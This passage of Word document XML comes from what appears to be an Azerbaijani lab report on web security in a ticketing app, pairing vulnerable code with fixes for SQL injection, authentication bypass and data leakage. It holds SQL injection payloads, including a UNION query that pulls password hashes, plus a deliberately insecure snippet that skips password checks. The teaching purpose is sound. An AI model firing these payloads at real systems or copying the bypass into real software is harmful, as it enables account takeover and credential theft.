          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="38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 OR 1=1--</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3446"/>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WHERE şərti mənasız olur; DB-dəki ilk istifadəçi qaytarılır</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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UNION inject (məlumat oğurluğu)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="38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 UNION SELECT id, email, password_hash, full_name FROM users LIMIT 1 OFFSET 0--</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3446"/>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İstənilən istifadəçinin sətri, o cümlədən password_hash, JSON-da görünür</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>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UNION injection nəticəsini user_get_by_id() funksiyası tanımır (saxta id), api_login() query_probe cavabı qaytarır — brauzerdə password_hash açıq görünür.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Düzgün Yol — Parametrləşdirilmiş Sorğu</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8846"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8846"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F0F4FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># backend/app.py — user_get_by_email()  ✅ TƏHLÜKƏSİZ</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">def user_get_by_email(email_lower: str):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    cur.execute(</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        "SELECT id, email, password_hash, full_name",</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        " FROM users WHERE lower(email) = %s",</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        (email_lower,)  # ← İstifadəçi girişi heç vaxt SQL mətninə yapışdırılmır</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    )</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>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psycopg2 %s parametrlərini SQL mətninə yapışdırmır — ayrıca göndərir. PostgreSQL sürücüsü parametrləri məlumat kimi işləyir, kod kimi yox. Buna görə ' OR 1=1-- payload-ı göndərilsə belə, PostgreSQL bunu email sütununda literal axtarır → 401 Unauthorized.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>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3000"/>
        <w:gridCol w:w="5846"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Mitiqasiya Tədbiri</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5846"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">İzahat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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%s parametrləri</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5846"/>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Bütün sorğularda istifadəçi girişi ayrıca parametr kimi ötürülür</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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ORM (SQLAlchemy)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5846"/>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Sorğuları avtomatik parametrləşdirir</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Prepared Statements</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5846"/>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DB səviyyəsində əvvəlcədən kompilyasiya — ən güclü müdafiə</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Minimum icazə</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5846"/>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DB istifadəçisi yalnız lazım olan cədvəllərə SELECT/INSERT hüququ olsun</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6.2. Autentifikasiya Bypass — OWASP A07:2021</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Zəif Kod (Lab)</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8846"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8846"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F0F4FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># backend/app.py — api_login()  ⚠️ DEV_AUTH_BYPASS=1 OLDUQDA</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">if INSECURE_SQL_DB and DEV_AUTH_BYPASS:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    pw_ok = True  # ← Parol heç yoxlanılmır — son dərəcə təhlükəlidir!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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SQLi ilə birlikdə istifadə ediləndə iki zəifliyin zənciri yaranır: SQL Injection → istifadəçi sətri gətirilir → Auth bypass → parol olmadan "uğurlu giriş" → Session → başqasının hesabına daxil olmaq.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Düzgün Yol</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8846"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8846"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F0F4FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># backend/app.py ✅ TƏHLÜKƏSİZ</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ph = row.get("password_hash")</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">try:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    pw_ok = bool(ph) and check_password_hash(str(ph), password)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    # check_password_hash: PBKDF2 hash-i yenidən hesabla, müqayisə et</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    # Timing-safe müqayisə — timing attack-a qarşı</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">except (TypeError, ValueError):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    pw_ok = False</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>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3000"/>
        <w:gridCol w:w="5846"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Mitiqasiya</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5846"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">İzahat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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check_password_hash() məcburi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5846"/>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Heç vaxt pw_ok = True hardcoded olmasın</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Lab kodu produksiyaya çıxmasın</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5846"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FCE4D6"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WEBSEC_LAB=0 istehsalda mütləq</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Bcrypt / Argon2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5846"/>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werkzeug PBKDF2 yaxşıdır, amma Argon2id daha müasirdir</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Giriş cəhdi limiti</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5846"/>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5 uğursuz giriş → müvəqqəti blok (rate limiting)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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2FA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5846"/>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İkinci faktor — SMS, TOTP (Google Authenticator)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6.3. Məlumat İfşası — OWASP A09:2021</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem</w:t>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UNION injection uğurlu olduqda api_login() JSON-da həssas məlumat qaytarır. Bu, Information Disclosure (məlumat ifşası) adlanır.</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8846"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8846"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F0F4FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Lab cavabında görünən:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">{</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    "ok": true,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    "user": {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        "email": "admin@aviakassa.com",</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        "password_hash": "$pbkdf2-sha256:260000:...",  # ← Həssas!</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        "full_name": "Sistem Admini"</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"query_probe": true,      # ← "injection işi tutdu" işarəsi</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    "sql_fragment": "...",    # ← Hücumçunun öz sorğusu</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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password_hash hash-dir, açıq parol deyil, lakin hashcat kimi brute-force alətləri ilə sındırıla bilər.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Düzgün Yol</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8846"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8846"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F0F4FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># İstehsal üçün düzgün cavab:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">return jsonify({</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    "ok": True,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    "message": "Xoş gəldiniz!",</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    "user": {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        "id": db_user["id"],</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        "email": db_user["email"],</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
